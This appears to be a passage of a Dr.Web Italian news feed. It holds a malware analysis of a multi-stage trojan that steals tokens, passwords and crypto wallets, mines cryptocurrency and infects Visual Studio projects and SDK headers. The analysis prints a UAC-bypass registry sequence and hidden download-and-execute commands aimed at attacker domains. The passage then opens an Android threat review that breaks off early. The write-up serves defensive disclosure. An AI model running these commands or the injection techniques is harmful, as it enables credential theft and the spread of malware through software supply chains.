fasi.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File Python malevoli&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Fase 2. Trojan.DownLoader49.35687&lt;/h3&gt;&lt;p&gt;In questa fase il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;esegue il controllo della propria esecuzione in sandbox. Oltre a ciò, crea un oggetto di sincronizzazione mutex con il nome Global\PFNMX(valore fisso). Esempio di un simile oggetto: &lt;span class="string"&gt;\Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008&lt;/span&gt;. In questo modo il trojan controlla se sul computer è già in esecuzione un'altra copia.&lt;/p&gt;&lt;p&gt;Durante la seconda fase, il trojan cerca di ottenere gli indirizzi del server C2 utilizzando i repository pubblici GitHub e della piattaforma di gioco Steam. Su di essi i malintenzionati lasciano domini che il trojan legge e utilizza come gli URL per scaricare la terza fase — il trojan &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Gli account Steam creati dai malintenzionati contengono un nome di dominio in chiaro.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Account Steam con un dominio C2&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Su GitHub i malintenzionati hanno salvato un indirizzo cifrato di un dominio C2 sotto forma di un file raw: &lt;span class="string"&gt;raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine&lt;/span&gt;. Il trojan scarica questo file e lo decodifica prima tramite Base64, e quindi tramite l'operazione XOR con la chiave ZwFlushKey.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Domini crittografati&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dopo aver scaricato la fase successiva,&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;la incorpora nel processo di uno dei 41 file eseguibili previamente specificati da &lt;span class="string"&gt;C:\Windows\System32&lt;/span&gt;.&lt;/p&gt;&lt;p&gt;Il trojan aggiunge l'indirizzo del dominio C2 a cui ha potuto stabilire una connessione alle stringhe trascritte nel suo codice sorgente e lo passa alla fase successiva tramite il named pipe pipe\VccFramework.&lt;/p&gt;&lt;h3&gt;Fase 3. BackDoor.Siggen2.5906&lt;/h3&gt;&lt;p&gt;La principale attività malevola si verifica in questa fase. &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; crea un oggetto di sincronizzazione mutex con un nome fisso di tipo Global\PFNX_Side(valore fisso). Quindi, attraverso il canale precedentemente creato, il trojan ottiene i dati dalla seconda fase, dai quali estrae gli identificatori del trojan e il dominio C2 con cui &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; comunicherà.&lt;/p&gt;&lt;p&gt;Per guadagnare persistenza nel sistema, il trojan scarica il file "bungee.boo", che svolge le funzioni di fase 2, ovvero&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35687&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, e sostituisce con quest'ultimo i file DLL:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;"profapi.dll" dell'applicazione Discord,&lt;/li&gt;&lt;li&gt;"domain_actions.dll" nella cartella "Domain Actions" e "well_known_domains.dll" nella cartella "Well Known Domains" dell'applicazione Microsoft Edge,&lt;/li&gt;&lt;li&gt;"C:\Windows\omadmapi.dll".&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Inoltre, &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; può alterare il registro di sistema di Windows in modo tale che all'apertura dei file compressi tramite WinRar.exe venga eseguito il codice malevolo.&lt;/p&gt;&lt;p&gt;Per le azioni con i permessi amministratore, il trojan utilizza una tecnica di aggiramento dell'UAC. Il malware genera un file .vbs con un nome composto da cifre casuali, in cui lascia il comando per l'esecuzione con i permessi amministratore. Quindi tramite cmd.exe vengono avviati i comandi:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In seguito, il trojan svolge 5 funzioni malevole: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.&lt;/p&gt;&lt;h3&gt;Stealer&lt;/h3&gt;&lt;p&gt;Il Trojan è in grado di rubare varie informazioni:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;i tocken Discord, che consentono di accedere agli account altrui senza inserire il login/la password;&lt;/li&gt;&lt;li&gt;le password e i cookie dai browser Chrome, Edge, Opera, Brave, Yandex ecc. Oltre alle solite tecniche di estrazione dei dati, esso può utilizzare il file CCCWF.tmp (&lt;strong&gt;Trojan.PWS.Siggen5.33623&lt;/strong&gt;). Si incorpora nel browser, e quindi legge le password e le salva in file di testo;&lt;/li&gt;&lt;li&gt;le cartelle di Telegram Desktop;&lt;/li&gt;&lt;li&gt;le cartelle del portafoglio crittografico Exodus.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Oltre a rubare le cartelle Exodus, il trojan esegue la modificazione del portafoglio crittografico. Per fare questo, esso trova il file app.asar e lo sostituisce con una copia scaricata dall'URL &lt;span class="string"&gt;balista[.]lol/Stb/PokerFace/RTApp[.]txt&lt;/span&gt; tramite curl. Nella versione furtivamente sostituita in index.js (&lt;strong&gt;Trojan.Siggen32.44702&lt;/strong&gt;) si trova la funzione unlock(), la quale all'esecuzione invia le frasi mnemoniche del portafoglio crypto al server dei malintenzionati.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File index.js furtivamente sostituito&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Clipper&lt;/h3&gt;&lt;p&gt;È una funzione particolarmente pericolosa del trojan. Il malware monitora costantemente gli appunti dell'utente: cerca i dati di carte bancarie e li invia al server dei malintenzionati. Inoltre, il programma malevolo sostituisce gli indirizzi di portafogli crypto con quelli fraudolenti, i quali ottiene dal server C2.&lt;/p&gt;&lt;h3&gt;Backdoor&lt;/h3&gt;&lt;p&gt;Le funzionalità del trojan consentono ai malintenzionati di gestire il PC infetto in remoto mediante i comandi:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;exc&lt;/td&gt;&lt;td&gt;scarica un file da un url tramite curl ed eseguilo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RVRS&lt;/td&gt;&lt;td&gt;avvia un Reverse Proxy&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RUNCMD&lt;/td&gt;&lt;td&gt;avvia un comando tramite cmd&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;GETFILE&lt;/td&gt;&lt;td&gt;carica il contenuto di un determinato file sul server di comando e controllo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;LISTDIR&lt;/td&gt;&lt;td&gt;invia la lista dei file da una determinata directory del computer al server di comando e controllo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;TROLL&lt;/td&gt;&lt;td&gt;esegui il comando per il trolling dell'utente, esistono le opzioni earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer ecc.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;h3&gt;Cryptominer&lt;/h3&gt;&lt;p&gt;Tramite curl, il trojan scarica dal server e avvia il file &lt;span class="string"&gt;https://files[.]catbox[.]moe/lvh9j3[.]bin&lt;/span&gt;&amp;nbsp;— &lt;strong&gt;Trojan.Packed2.50953&lt;/strong&gt;. La sua struttura e le sue azioni sono simili a quelle della fase 2, ma, invece di &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;, esso scarica e incorpora &lt;strong&gt;Trojan.BtcMine.3956&lt;/strong&gt;. Questo cryptominer si avvia solo dopo un determinato periodo di inattività dell'utente. Il malware utilizza gli strumenti &lt;a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener"&gt;XMRig&lt;/a&gt;, &lt;a href="https://github.com/trexminer/T-Rex" target="_blank" rel="noopener"&gt;T-Rex&lt;/a&gt; e &lt;a href="https://github.com/todxx/teamredminer/releases" target="_blank" rel="noopener"&gt;TeamRedMiner &lt;/a&gt;a codice sorgente aperto.&lt;/p&gt;&lt;h3&gt;Infezione di file&lt;/h3&gt;&lt;p&gt;Il principale tratto distintivo di questo trojan sono l'infezione di file e l'ulteriore propagazione autonoma. La lista dei file che vengono infettati:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;imgui_impl_win32.cpp,&lt;/li&gt;&lt;li&gt;.suo,&lt;/li&gt;&lt;li&gt;.exe,&lt;/li&gt;&lt;li&gt;winnetwk.h (Windows SDK),&lt;/li&gt;&lt;li&gt;.vcxproj e .csproj.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Per determinare i percorsi dei file che possono essere infettati, il trojan scansiona sequenzialmente i dischi e avvia il comando. Esempio per il disco A://&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj &amp;gt; %ALLUSERSPROFILE%\ADat.bin3290.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I malintenzionati contano su quello che gli sviluppatori pubblicheranno i loro progetti con codice malevolo in accesso aperto. Altri sviluppatori, che assembleranno, compileranno o modificheranno il progetto, infetteranno automaticamente i propri computer a causa dei file .suo, .vcxproj e .csproj, mentre gli utenti comuni potranno avviare i file eseguibili infetti, creati tramite gli strumenti di sviluppo compromessi.&lt;/p&gt;&lt;h3&gt;File imgui_impl_win32.cpp. Trojan.Loader.3129&lt;/h3&gt;&lt;p&gt;Il file imgui_impl_win32.cpp è parte della popolare libreria Dear ImGui, responsabile dell'interfaccia grafica del linguaggio di programmazione C++. Il trojan incorpora nel file due stringhe: la prima contiene il payload, la seconda lo lancia.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Stringa di codice con il payload&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Stringa di codice con l'avvio del payload&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Il risultato è il comando&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "&amp;amp; { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Pertanto, la libreria viene infettata, e qualsiasi applicazione in C++ creata dall'utente conterrà in sé codice malevolo. Con il trasferimento o caricamento delle simili applicazioni, l'infezione si diffonderà ulteriormente.&lt;/p&gt;&lt;h3&gt;File .suo. Trojan.Loader.3138&lt;/h3&gt;&lt;p&gt;È un'estensione dei file dell'ambiente di sviluppo Microsoft Visual Studio. In questi file sono conservate le impostazioni dell'utente per determinati progetti. Il trojan sostituisce il file originale con quello infetto, ottenuto dal C2.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File infetto&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Come risultato, all'apertura del progetto in Visual Studio viene avviato il codice malevolo:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" &amp;amp;&amp;amp; start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3&gt;File winnetwk.h. Trojan.Loader.3184&lt;/h3&gt;&lt;p&gt;Windows SDK è un set di strumenti ufficiale di Microsoft che consente di creare applicazioni per SO Windows.&lt;/p&gt;&lt;p&gt;Tramite il registro, il trojan trova la cartella in cui è installato Windows SDK. In questa cartella avviene la ricerca del file &lt;span class="string"&gt;winnetwk.h&lt;/span&gt;, responsabile dell'interazione con le risorse di rete. Quindi ad esso viene aggiunto il codice malevolo.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;File winnetwk.h infetto&lt;/i&gt;&lt;/p&gt;&lt;p&gt;A seguito di questo, tutti i programmi creati con l'utilizzo di winnetwk.h avranno il codice malevolo, il quale avvia la fase 2.&lt;/p&gt;&lt;h3&gt;File .exe&lt;/h3&gt;&lt;p&gt;Il trojan cerca i file .exe adatti e incorpora in essi le funzioni di inizializzazione delle API e di avvio di initterm. Quindi il file inizia a funzionare come&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.DownLoader49.35384&amp;lng=it"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;, ovvero la fase 1.&lt;/p&gt;&lt;h3&gt;File .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) e .csproj (Trojan.Loader.3126)&lt;/h3&gt;&lt;p&gt;Sono file dei progetti Visual Studio nei linguaggi di programmazione C++ e C#. Ad essi viene aggiunto il comando PreBuildEvent, che viene eseguito prima di ciascun assemblaggio di un progetto. Le prime versioni del trojan aggiungevano un codice simile alla fase 1.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una prima versione di codice&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Nelle nuove versioni il codice è diventato più complesso, è comparso un ulteriore offuscamento.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una nuova versione di codice&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una delle fasi di esecuzione di &lt;strong&gt;Trojan.Loader.3128&lt;/strong&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Come risultato dell'esecuzione del comando malevolo, viene scritto un file .vbs malevolo, il quale, a sua volta, avvia PowerShell payload. Il trojan effettua una richiesta agli indirizzi URL:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;youtu.be/akoxddx6lgc,&lt;/li&gt;&lt;li&gt;steamcommunity.com/profiles/76561198737324192.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Su questi indirizzi è conservato un altro indirizzo URL crittografato tramite base64.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Account YouTube con un indirizzo URL crittografato&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dopo la decodifica, il trojan ottiene un dominio C2 a cui esso si connette per ricevere il payload, che è simile alla fase 2.&lt;/p&gt;&lt;p&gt;La descrizione del funzionamento del trojan ci permette di concludere che esso rappresenta un pericolo elevato a causa della combinazione di diverse funzioni malevole. Per evitare l'infezione del proprio computer e l'ulteriore diffusione del trojan, vi consigliamo di aggiornare regolarmente i database antivirus e controllare tutti i file scaricati da internet. Gli utenti dell'antivirus Dr.Web Security Space e Dr.Web Desktop Security Suite possono essere tranquilli, in quanto il trojan viene rilevato ed eliminato in modo affidabile dagli antivirus Dr.Web. I file di tipo .vcxproj, .csproj e imgui vengono curati, da essi viene eliminato il codice malevolo.&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15274&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in II trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15274&amp;lng=it&amp;c=5</link><pubDate>Wed, 01 Jul 2026 04:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 luglio 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo i dati delle statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel II trimestre 2026 si osservava una diminuzione dell'attività dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; — del 31,83% rispetto al I trimestre. Ciononostante, essi sono rimasti il malware per Android più diffuso: questa famiglia ha rappresentato il 23,28% dei rilevamenti del relativo tipo di minacce. Questi programmi malevoli rubano diversi dati riservati, come ad esempio SMS con codici monouso di istituti di credito, login e password di account di home banking, nonché possono visualizzare finestre di phishing. Come anche nel trimestre precedente, gli utenti riscontravano prevalentemente la sottofamiglia Android.Banker.Mamont, che include varie applicazioni malevole.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Durante i tre mesi passati, è continuato il calo dell'attività dei trojan pubblicitari delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Tuttavia, esse sono ancora una delle applicazioni malevole Android più frequentemente riscontrate, e alcune loro varianti sono come prima tra i malware leader per il numero di rilevamenti.&lt;/p&gt;

&lt;p&gt;Il software potenzialmente pericoloso più diffuso con una quota oltre il 66% di nuovo sono stati i programmi in cui, per confondere la logica, è aggiunto codice spazzatura (rilevati come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). Questa modificazione viene effettuata tramite gli strumenti hacker per il modding NP Manager. Questi strumenti vengono utilizzati anche dai malintenzionati — per proteggere i programmi malevoli, come i trojan bancari &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, dal rilevamento tramite antivirus.&lt;/p&gt;

&lt;p&gt;Alla seconda posizione si sono classificate le applicazioni che anche vengono modificate tramite l'utility NP Manager, ma con l'utilizzo di alcune delle sue altre funzionalità. Ad esempio, in questo strumento sono previsti diversi moduli per la protezione e l'offuscamento del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la loro modificazione. Gli attori di minacce utilizzano queste funzionalità per proteggere i malware dagli antivirus. I prodotti antivirus Dr.Web rilevano i programmi modificati in questo modo come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Tra le applicazioni potenzialmente pericolose più diffuse di nuovo si trovano anche i programmi modificati tramite l'utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Per la loro modificazione, l'utility scarica da internet script appositamente preparati.&lt;/p&gt;

&lt;p&gt;I programmi indesiderati più attivi nel II trimestre sono state le applicazioni &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, che imitano il funzionamento di antivirus. Presumibilmente rileverebbero alcune minacce e quindi suggeriscono l'acquisto di una versione completa per "combatterle". Le simili applicazioni false hanno rappresentato oltre il 44% dei software indesiderati rilevati sui dispositivi Android.&lt;/p&gt;

&lt;p&gt;I software pubblicitari più diffusi sono stati i moduli &lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;, che possono essere incorporati in applicazioni Android. Visualizzano notifiche pubblicitarie che fuorviano gli utenti. Questi moduli raccolgono anche vari dati riservati. Inoltre, gli utenti come prima riscontravano i programmi di ottimizzazione &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Essi creano periodicamente notifiche con i messaggi fuorvianti su presunti errori di sistema e memoria operativa insufficiente. Queste app visualizzano annunci pubblicitari durante "l'ottimizzazione". Anche i programmi pubblicitari &lt;b&gt;Adware.Opensite.15&lt;/b&gt;. Hanno manifestato nuovamente un'alta attività. I malintenzionati li spacciano per app con cheat che presumibilmente consentirebbero di ottenere risorse in giochi, ma in realtà i programmi solo caricano siti con annunci.&lt;/p&gt;

&lt;p&gt;All'inizio di giugno gli specialisti dell'azienda Doctor Web hanno segnalato &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; — un trojan che è capace di aggirare le restrizioni del sistema operativo Android e visualizzare la pubblicità in background. A questo scopo, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sfrutta applicazioni di terze parti, nonché utilizza determinate tecniche che esso seleziona in base al produttore del dispositivo infetto. Abbiamo parlato di questo trojan in maggior dettaglio nel &lt;a href="https://news.drweb-av.it/show/?i=15262" target="_blank"&gt;materiale&lt;/a&gt; corrispondente sul nostro sito.&lt;/p&gt;

&lt;p&gt;Durante il II trimestre, gli analisti dei virus Doctor Web hanno rilevato sullo store di app Google Play ulteriori programmi malevoli che abbonano le loro vittime a servizi a pagamento. Includevano, in particolare, campioni delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di II trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;I trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; rimangono i programmi malevoli per SO Android più diffusi.&lt;/li&gt;
        &lt;li&gt;Gli attori di minacce continuano a utilizzare attivamente gli strumenti per il modding di programmi Android per proteggere i trojan bancari dal rilevamento tramite antivirus. &lt;/li&gt;
        &lt;li&gt;Diminuisce di nuovo l'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
        &lt;li&gt;È rilevato un trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.MagicAd.1&amp;lng=it"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, che utilizza applicazioni di terze parti per aggirare le restrizioni di SO Android e visualizzare la pubblicità in background.&lt;/li&gt;
        &lt;li&gt;Compaiono nuovi programmi malevoli sullo store di app Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
